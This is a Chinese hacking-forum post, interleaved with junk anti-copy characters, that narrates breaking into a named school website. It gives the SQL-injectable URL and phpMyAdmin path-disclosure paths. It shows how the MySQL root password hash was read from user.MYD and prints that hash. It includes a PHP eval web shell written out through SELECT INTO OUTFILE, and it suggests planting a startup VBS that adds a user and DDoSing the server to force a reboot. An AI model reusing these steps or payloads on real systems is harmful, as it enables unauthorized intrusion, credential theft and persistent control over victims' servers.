第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
) P" a! N& ]& p- X, j7 i2 P发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!: {6 n% D* f) g [
1 T* A* h. V' z% b( t- L b) D" c
# E0 s. [0 X# a- M% b" D
8 ]1 c' z8 o; d) Y# o0 Q常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
+ G- ^$ G+ b4 f" A/ Y& K X3 i1 ~0 p
, y) c! r9 s2 T. z那么想可以直接写入shell ,getshell有几个条件:. d& g+ M+ f& a( S, p. O6 F7 r
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
: H2 L. `' a4 O( \( p0 W/ l; y( y* a% E
试着爆绝对路径: 5 z1 J9 z6 t7 j( r8 j
1./phpMyAdmin/index.php?lang[]=1 * s. y9 w+ m' ?1 M0 q' L7 `) c
2./phpMyAdmin/phpinfo.php
) z3 f7 f, Q6 `3./load_file()
! S: h+ m8 {2 B9 Z8 n# |4 n8 L4./phpmyadmin/themes/darkblue_orange/layout.inc.php L0 C( }" d/ |- `% Q# Q
5./phpmyadmin/libraries/select_lang.lib.php ! I! i/ U" y8 T3 Z
6./phpmyadmin/libraries/lect_lang.lib.php 8 J) c5 \* K8 H6 ^
7./phpmyadmin/libraries/mcrypt.lib.php , R% q, j( [% X) b- a3 W; J& j. v
8./phpmyadmin/libraries/export/xls.php 4 L: V I% q, W( L
- O' v6 U k5 p/ F$ H均不行...........................
# b: @1 Y" R" }! P) `" y1 m
+ w' M* n1 t3 L4 C御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
& R4 H* Q5 D' H; v4 d8 d6 I0 e% r( a% h* [' i8 ?" f3 y/ |4 [
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
' A: J( u5 ~( l0 B5 B" L7 O7 O# X. U+ c" A
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
4 ?" C" H6 z7 ~7 E
. J6 n$ E1 r+ C& f# J" I敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
9 r) c2 g8 h3 o; z/ a0 A, L3 |! ?* h
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 4 `' h" ~) L; _6 f* m8 r7 k
8 K- q& }7 o2 A, b+ }+ b V& U
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini L0 O, t7 d% X1 E( U7 {% h
" m- {$ o6 y9 t2 N
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ' O& P" J! C5 P8 I, g# @
* h+ c! t+ o# U/ P' y- H2 j. r
成功读到root密码:
. ?) ~7 E d6 `( h1 r& F" P# e, h
17---- r(0072)
. W# v& {+ j. S, z9 w9 p18---- o(006f)
" {0 _' L2 |$ b0 ]4 H19---- o(006f) 3 ~5 J8 X" I$ C$ w4 ^8 E+ F; u
20---- t(0074)
" ]5 E7 Q E- P21---- *(002a)
9 L( j# [$ @" W6 \22---- 8(0038)
9 e. {/ L! d4 ]( H23---- 2(0032)
# L% d1 U: _0 z24---- E(0045) , I; |* x* ?( r; z( x6 T, T$ B* V
25---- 1(0031) 9 p0 q3 P8 k4 s# w& ~' A
26---- C(0043)
`# Y8 Q/ D* a9 `# d# S& i( o6 [27---- 5(0035) 0 t C2 C. O4 G p! p
28---- 8(0038) , E: o+ O( i% b2 @) e
29---- 2(0032) & [/ Q' k+ L. l* p$ c; q( M
30---- 8(0038) 6 O) ~0 v/ i1 P# |' A {2 ~
31---- A(0041)
p2 n+ m1 S# j9 u. _32---- 9(0039) . a; U7 @7 k. ]: Q
33---- B(0042)
7 Q. J0 @* u( g" p5 x7 e34---- 5(0035)
9 Q$ N' |$ B% t+ e h35---- 4(0034)
8 s! T. [! R$ ?- w36---- 8(0038)
2 y& W/ Y# k1 z( j37---- 6(0036)
5 N$ `9 K& t# P5 O X( i38---- 4(0034)
0 G5 J3 Q$ _9 ]" F# y' w2 G$ G39---- 9(0039) : z: p+ `8 B( c) d9 a3 O6 R3 Z
40---- 1(0031) 8 P, O4 ~8 U# I# p3 T# c: d
41---- 1(0031) , J5 |" ~0 f4 A2 U. ] I, ^% B1 s0 `
42---- 5(0035) . H- X& F* L/ q6 _
43---- 3(0033)
' b+ r. d9 g# s0 {: C44---- 5(0035) : G; X1 V* L# l% A
45---- 9(0039) - r, V6 K' k/ h) r. l. T( x
46---- 8(0038) 1 H2 H ^) O6 X
47---- F(0046)
: P3 O" o9 ]& d/ I- i7 y48---- F(0046)
- B5 V' u7 ]$ c) E& ]5 W49---- 4(0034) : l- h, \7 F/ {" v4 y2 n! z
50---- F(0046) 8 T" G+ e- Z# S- ` V. `
51---- 0(0030)
# D2 q, ]" c: U8 g& c# L' ]% I52---- 3(0033) 2 x) L- l" W( M1 ~. c( E
53---- 2(0032) - \ c0 t4 @$ t3 t- ?/ K
54---- A(0041) $ a2 p" q0 p4 H2 B
55---- 4(0034)
. v" C% Q/ t3 L: d! X56---- A(0041) % ~! [; X) V! `+ u3 f7 N
57---- B(0042) ' S1 M" j9 n) P5 I3 m, U* {( U
58---- *(0044)
5 o+ P ?2 v, }8 v/ I) I3 v59---- *(0035)
5 e0 s: h6 O3 }' A& t60---- *(0041) 6 t( \1 l0 m F) @9 t1 P
61---- *0032) : u$ b( U, h" m
M9 B! K6 a" O& S解密后成功登陆phpmyamin
, ?, E' V3 O2 l" d6 B % Q# I9 r* v2 p
' J( E7 @; k+ {) B' m( |+ t
$ T; ^0 G- B; A7 y; D3 M: ^1 w- @; R0 Q; R- p8 p# B( v
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
. v! [4 ^: q, ]
1 d! K* s, J0 j0 [成功执行,拿下shell,菜刀连接: 9 G9 _! p' Y( m b, T- R
' e1 i" R" C! {服务器不支持asp,aspx,php提权无果...................
6 O- o5 L" g+ m3 v, R) a) s: Q- ^) d; E
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: : `1 Z9 g+ ^) @* D
服务器上已经有个隐藏帐号了 ! p# L4 y+ Q" X6 Y7 _2 ?) g! E/ V" a
别名 administrators( U- y" v5 R2 G' I& F) l, C1 O
注释 管理员对计算机/域有不受限制的完全访问权 / P+ g8 E1 w6 B! u5 W1 x, a
成员
. [' J" S* c% ~0 l; n( d-------------------------------------------------------------------------------
- ]" m0 X+ D6 R4 ^% x1 Dadmin3 }# [0 f) Q- e# [* K% i; S
Administrator
, U7 _1 P' V& J0 O \slipper$, r+ d4 l m' r2 [! s9 R) z6 S) G
sqluser
6 Y2 T: ~0 `( J0 l) U& b命令成功完成。
+ ~# X: M. |; i3 t7 y/ D
2 P, V! w! S6 d: o/ D# @- E服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
6 G, S4 ]) _8 \' x3 t/ J/ W2 U3 X) x+ p4 {% f9 S4 X' j- ?
ddos服务器重启,不然就只能坐等服务器重启了...............................
$ L8 Y! f v' c3 W6 `" ?3 p
; C$ ~3 i5 O3 k( u% A+ p- h: t5 N
+ \- E/ C( s# a1 o0 j2 A& ^9 H | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
